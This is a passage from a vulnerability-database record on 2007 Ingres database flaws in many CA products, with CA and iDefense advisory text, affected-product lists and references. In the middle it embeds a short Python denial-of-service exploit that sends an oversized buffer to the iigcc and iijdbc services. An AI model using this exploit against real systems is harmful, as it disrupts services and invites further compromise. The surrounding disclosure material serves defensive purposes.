"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/24585"
},
{
"trust": 1.6,
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"trust": 1.6,
"url": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25775"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25756"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34998"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34995"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/472194/100/0/threaded"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/472197/100/0/threaded"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"trust": 1.0,
"url": "http://osvdb.org/37483"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3338"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34998"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/34995"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/472197/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/472194/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2290"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2007/2288"
},
{
"trust": 0.4,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/472192"
},
{
"trust": 0.3,
"url": "/archive/1/471950"
},
{
"trust": 0.3,
"url": "/archive/1/472197"
},
{
"trust": 0.3,
"url": "/archive/1/472193"
},
{
"trust": 0.3,
"url": "/archive/1/472194"
},
{
"trust": 0.3,
"url": "/archive/1/472200"
},
{
"trust": 0.3,
"url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
},
{
"trust": 0.3,
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ngssoftware.com/research/advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-380"
},
{
"db": "NVD",
"id": "CVE-2007-3338"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"db": "PACKETSTORM",
"id": "57303"
},
{
"db": "PACKETSTORM",
"id": "92818"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-380"
},
{
"db": "NVD",
"id": "CVE-2007-3338"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-21T00:00:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"date": "2007-06-26T21:32:27",
"db": "PACKETSTORM",
"id": "57303"
},
{
"date": "2010-08-17T01:35:50",
"db": "PACKETSTORM",
"id": "92818"
},
{
"date": "2007-06-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-380"
},
{
"date": "2007-06-22T18:30:00",
"db": "NVD",
"id": "CVE-2007-3338"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-19T08:36:00",
"db": "BID",
"id": "24585"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-004029"
},
{
"date": "2007-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-380"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-3338"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-380"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Product Ingres database server Vulnerable to stack-based buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-004029"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-380"
}
],
"trust": 0.6
}
}
VAR-200706-0395
Vulnerability from variot - Updated: 2025-04-10 22:57Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High risk rating.
Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1
Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.
Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities
iDefense Security Advisory 06.21.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 21, 2007
I. BACKGROUND
Ingres is the database backend used by default in several CA products. The SCM (Secure Content Manager) is one of the products that uses Ingres. The SCM use Ingres to store quarantined virii and blocked HTTP requests/replies. For more information visit the following URLs.
http://www3.ca.com/solutions/Product.aspx?ID=1013
http://www.ingres.com/
II. The Communications Server is the main component responsible for receiving and handling requests from the network. The Data Access Server is responsible for handling requests from the Ingres JDBC Driver and .NET data providers. These requests are decoded into Ingres internal formats and passed on to other components of the database server.
The application does not properly validate the length of attacker supplied data before copying it into a fixed size heap buffer. This leads to an exploitable condition.
III. ANALYSIS
Exploitation allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.
In order to exploit this vulnerability an attacker would have to send a malformed request to the database server. This requires the ability to establish a TCP session on port 10916 (iigcc) or 10923 (iigcd).
Exploitation has been demonstrated to be trivial.
IV. Previous versions may also be affected. In addition, any application that uses the Ingres Database may be vulnerable.
V. WORKAROUND
Employing firewalls or other access control methods can effectively reduce exposure to this vulnerability.
VI. VENDOR RESPONSE
CA has made fixes available for all supported CA products that embed Ingres. For more information consult CA's Security Alert at the following URL.
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3334 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
01/16/2007 Initial vendor notification 01/17/2007 Initial vendor response 06/21/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
Date: 2010-08-14
Author: fdisk
Version: 2.6
Tested on: Windows 2003 Server SP1 en
CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
Notes: Fixed in the last version.
please let me know if you are/were able to get code execution
import socket import sys
if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]
if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)
print service + " crashed"
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200706-0395",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database server",
"scope": "eq",
"trust": 1.8,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "r8"
},
{
"model": "windows",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "all windows",
"scope": null,
"trust": 0.6,
"vendor": "microsoft",
"version": null
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "3.0.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.5"
},
{
"model": "associates wily soa manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates unicenter workload control center 1.0.sp4",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter workload control center sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng 2.4.2j",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.5"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service assure",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter patch management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter management portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1.1"
},
{
"model": "associates unicenter lightweight portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2"
},
{
"model": "associates unicenter job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter enterprise job manager sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter desktop management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter desktop and server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter database command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.11"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2.1"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.3"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter asset intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter advanced systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust web access control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust network forensics",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust iam toolkit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust iam suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates docserver",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath aion bre",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor storage resource manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor storage command center",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for hp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for aix",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion harvest change manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7"
},
{
"model": "associates allfusion enterprise workbench sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates allfusion enterprise workbench",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
}
],
"sources": [
{
"db": "BID",
"id": "24585"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002222"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-357"
},
{
"db": "NVD",
"id": "CVE-2007-3334"
}
]
},
"configurations": {
"@context": {
